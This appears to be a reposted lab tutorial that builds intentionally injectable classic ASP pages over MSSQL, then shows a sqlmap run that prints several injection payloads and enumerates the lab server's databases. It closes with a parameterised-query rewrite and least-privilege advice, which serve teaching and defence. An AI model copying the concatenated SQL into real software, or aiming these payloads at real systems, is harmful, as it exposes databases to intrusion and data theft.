Constructing an MSSQL injection point

    <%
    ' Vulnerable by design: the id parameter is concatenated straight into the SQL text,
    ' so anything after the number becomes part of the query.
    dim prodId, conn, rs, query
    prodId = Request.QueryString("id")

    set conn = server.createObject("ADODB.Connection")
    set rs = server.createObject("ADODB.Recordset")

    query = "select prodName from products where id = " & prodId

    ' "数据库" and "密码" stand in for the database name and the sa password
    conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=数据库; User Id=sa; Password=密码"
    rs.activeConnection = conn
    rs.open query
    if not rs.eof then
        response.write "Got product " & rs.fields("prodName").value
    else
        response.write "No product found"
    end if
    %>
    SQL statements: create the table, then the rows the page will query:
    
    create table products
    (
    id int identity(1,1) not null,
    prodName varchar(50) not null
    )
     
    insert into products(prodName) values('1')
    insert into products(prodName) values('2')
    insert into products(prodName) values('3')
    
    
    root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql.asp?id=1" --dbs

    sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 13:10:54

    [13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
    [13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
    [13:10:55] [INFO] testing connection to the target url
    [13:10:55] [INFO] heuristics detected web page charset 'ascii'
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 2431=2431

        Type: error-based
        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
        Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)))

        Type: UNION query
        Title: Generic UNION query (NULL) - 1 column
        Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)--

        Type: stacked queries
        Title: Microsoft SQL Server/Sybase stacked queries
        Payload: id=1; WAITFOR DELAY '0:0:5';--

        Type: AND/OR time-based blind
        Title: Microsoft SQL Server/Sybase time-based blind
        Payload: id=1 WAITFOR DELAY '0:0:5'--
    ---
    [13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows XP
    web application technology: ASP, Microsoft IIS 5.1
    back-end DBMS: Microsoft SQL Server 2005
    [13:10:55] [INFO] fetching database names
    [13:10:55] [INFO] the SQL query used returns 5 entries
    [13:10:55] [INFO] retrieved: "master"
    [13:10:55] [INFO] retrieved: "model"
    [13:10:55] [INFO] retrieved: "msdb"
    [13:10:55] [INFO] retrieved: "myDB"
    [13:10:55] [INFO] retrieved: "tempdb"
    available databases [5]:
    [*] master
    [*] model
    [*] msdb
    [*] myDB
    [*] tempdb

    [13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

    [*] shutting down at 13:10:55

    root@Dis9Team:/pen#

    --------------------------------------------------- The Great Divider --

    POST SQL injection point

    SQL:
    create table users
    (
    userId int identity(1,1) not null,
    userName varchar(50) not null,
    userPass varchar(20) not null
    )

    insert into users(userName, userPass) values('john', 'doe')
    insert into users(userName, userPass) values('admin', 'wwz04ff')
    insert into users(userName, userPass) values('fsmith', 'mypassword')

    ASP:

    <%
    ' Vulnerable by design: both form fields are spliced into the WHERE clause as string literals.
    dim userName, password, query
    dim conn, rs
    userName = Request.Form("userName")
    password = Request.Form("password")

    set conn = server.createObject("ADODB.Connection")
    set rs = server.createObject("ADODB.Recordset")

    query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"

    conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password="
    rs.activeConnection = conn
    rs.open query
    if not rs.eof then
        response.write "Logged In"
    else
        response.write "Bad Credentials"
    end if
    %>

    HTML form that submits the credentials:

    <form name="frmLogin" action="ASP.asp" method="post">
    Username: <input type="text" name="userName">
    Password: <input type="text" name="password">
    <input type="submit">
    </form>
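Both pages above, the GET product lookup and the POST login check, build their SQL by string concatenation, which is exactly what every sqlmap technique in the run above relies on. As an added example that is not part of the original post, here are the same two queries rewritten for classic ASP with ADODB.Command parameters, so the driver sends the values separately from the statement text and a quote or semicolon in the input can never change the query. The table names come from the post; the low-privilege login `web_ro` and its password placeholder are assumptions, as is the `FindProduct` / `CredentialsValid` structure.

```vbscript
<%
Option Explicit
' Added example (not from the original post): the two lookups rewritten with
' ADODB.Command parameters. Assumes the `products` and `users` tables from the
' post; the login `web_ro` and its password are placeholders.

' ADO constants (ASP pages have no adovbs.inc unless it is included explicitly)
Const adCmdText = 1
Const adParamInput = 1
Const adInteger = 3
Const adVarChar = 200

Dim conn
Set conn = Server.CreateObject("ADODB.Connection")
' Assumption: a dedicated login that can only read the two tables, instead of sa
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=web_ro; Password=<placeholder>"

' GET: product lookup by numeric id. Returns "" when the id is invalid or unknown.
Function FindProduct(rawId)
    Dim cmd, rs, re
    FindProduct = ""
    ' Reject anything that is not a short run of digits before it reaches the driver
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If Not re.Test(rawId) Then Exit Function

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select prodName from products where id = ?"
    ' The value travels as a typed parameter, never as part of the SQL text
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(rawId))
    Set rs = cmd.Execute
    If Not rs.EOF Then FindProduct = rs.Fields("prodName").Value
    rs.Close
End Function

' POST: login check. Returns True only when exactly one matching row exists.
Function CredentialsValid(userName, password)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "select count(*) from users where userName = ? and userPass = ?"
    ' Sizes match the varchar(50) / varchar(20) columns from the post's schema
    cmd.Parameters.Append cmd.CreateParameter("u", adVarChar, adParamInput, 50, userName)
    cmd.Parameters.Append cmd.CreateParameter("p", adVarChar, adParamInput, 20, password)
    Set rs = cmd.Execute
    CredentialsValid = (rs.Fields(0).Value = 1)
    rs.Close
End Function

Dim prodName
prodName = FindProduct(Request.QueryString("id"))
If prodName <> "" Then
    ' Encode on output so a stored value cannot inject into the HTML either
    Response.Write "Got product " & Server.HTMLEncode(prodName)
Else
    Response.Write "No product found"
End If

If Request.ServerVariables("REQUEST_METHOD") = "POST" Then
    If CredentialsValid(Request.Form("userName"), Request.Form("password")) Then
        Response.Write "Logged In"
    Else
        Response.Write "Bad Credentials"
    End If
End If

conn.Close
%>
```

Parameterising the statements removes the injection itself; it does not change the other two things the post's setup exposes. The `users` table stores passwords in clear text, so a read anywhere else in the application would still leak them, and the original pages connect as `sa`, which is what turns the stacked-queries finding above into a whole-server problem rather than a one-database one. A login that holds only the rights the page needs bounds what any future injection can reach, whichever technique finds it.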
Original article: https://www.cnblogs.com/94YY/p/2451290.html